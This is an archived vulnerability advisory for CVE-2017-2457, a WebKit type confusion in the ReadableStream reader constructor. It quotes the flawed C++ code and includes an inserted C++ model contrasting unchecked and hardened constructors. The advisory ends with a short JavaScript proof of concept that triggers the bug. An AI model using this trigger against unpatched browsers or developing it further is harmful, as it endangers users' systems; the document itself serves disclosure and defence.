PACKETSTORM:141966

WebKit constructJSReadableStreamDefaultReader Type Confusion

2017-04-09 00:00:00
Google Security Research
packetstormsecurity.com

EPSS: 0.114 (Low), percentile 94.7%
WebKit: Type confusion in constructJSReadableStreamDefaultReader  
  
CVE-2017-2457  
  
  
EncodedJSValue JSC_HOST_CALL constructJSReadableStreamDefaultReader(ExecState& exec)  
{  
    VM& vm = exec.vm();  
    auto scope = DECLARE_THROW_SCOPE(vm);  
  
    JSReadableStream* stream = jsDynamicDowncast<JSReadableStream*>(exec.argument(0));  
    if (!stream)  
        return throwArgumentTypeError(exec, scope, 0, "stream", "ReadableStreamReader", nullptr, "ReadableStream");  
  
    JSValue jsFunction = stream->get(&exec, Identifier::fromString(&exec, "getReader")); <<--- 1  
  
    CallData callData;  
    CallType callType = getCallData(jsFunction, callData);  
    MarkedArgumentBuffer noArguments;  
    return JSValue::encode(call(&exec, jsFunction, callType, callData, stream, noArguments));  
}  
  
The value of |getReader| fetched at (1) is handed to call() without checking whether it is callable.  
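A self-contained C++ model of the missing check, added here as an illustration and not WebKit's code: JSValue, CallData, ReadableStream and both constructor shapes are constructed stand-ins for the JSC types above, and the hardened form refuses to dispatch when getCallData reports CallType::None.

```cpp
#include <cstdint>
#include <functional>
#include <stdexcept>
#include <string>

// Constructed stand-in for a JSC JSValue: either a primitive (the PoC stores the
// integer 0x12345 in |getReader|) or a callable. Real JSC packs this into one word.
struct JSValue {
    enum class Kind { Primitive, Callable } kind;
    int64_t primitive = 0;
    std::function<std::string(const std::string&)> callable;
};

enum class CallType { None, Host };
struct CallData { std::function<std::string(const std::string&)> fn; };

// Mirrors getCallData(): a non-callable value yields CallType::None and leaves
// CallData untouched, exactly the case the advisory's constructor never inspects.
CallType getCallData(const JSValue& v, CallData& out) {
    if (v.kind != JSValue::Kind::Callable)
        return CallType::None;
    out.fn = v.callable;
    return CallType::Host;
}

struct ReadableStream { JSValue getReader; };  // the property looked up at (1)

// Shape of the vulnerable path: callType is ignored, so the empty CallData reaches
// dispatch. Here that is a std::bad_function_call; in the engine it is the cast of
// 0x12345 to an object pointer, i.e. the type confusion.
std::string constructReaderUnchecked(const ReadableStream& s) {
    CallData cd;
    getCallData(s.getReader, cd);
    return cd.fn("stream");
}

// Hardened shape: refuse to dispatch when the value is not callable and raise a
// TypeError (modelled as std::invalid_argument) instead.
std::string constructReaderChecked(const ReadableStream& s) {
    CallData cd;
    if (getCallData(s.getReader, cd) == CallType::None)
        throw std::invalid_argument("TypeError: getReader is not a function");
    return cd.fn("stream");
}

// Constructed inputs: a stream with a genuine getReader, and the PoC's overwritten one.
ReadableStream benignStream() {
    return {JSValue{JSValue::Kind::Callable, 0,
                    [](const std::string& s) { return "DefaultReader(" + s + ")"; }}};
}
ReadableStream confusedStream() { return {JSValue{JSValue::Kind::Primitive, 0x12345, {}}}; }

// True when the given constructor rejects the input by throwing.
template <typename F> bool rejects(F f, const ReadableStream& s) {
    try { f(s); return false; } catch (const std::exception&) { return true; }
}
```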
  
PoC:  
  
let rs = new ReadableStream();  
let cons = rs.getReader().constructor;  
  
rs.getReader = 0x12345;  
new cons(rs);  
  
Tested on WebKit Nightly 10.0.2 (12602.3.12.0.1, r210800: https://crrev.com/210800)  
  
  
This bug is subject to a 90 day disclosure deadline. If 90 days elapse  
without a broadly available patch, then the bug report will automatically  
become visible to the public.  
  
  
  
  
Found by: lokihardt  
  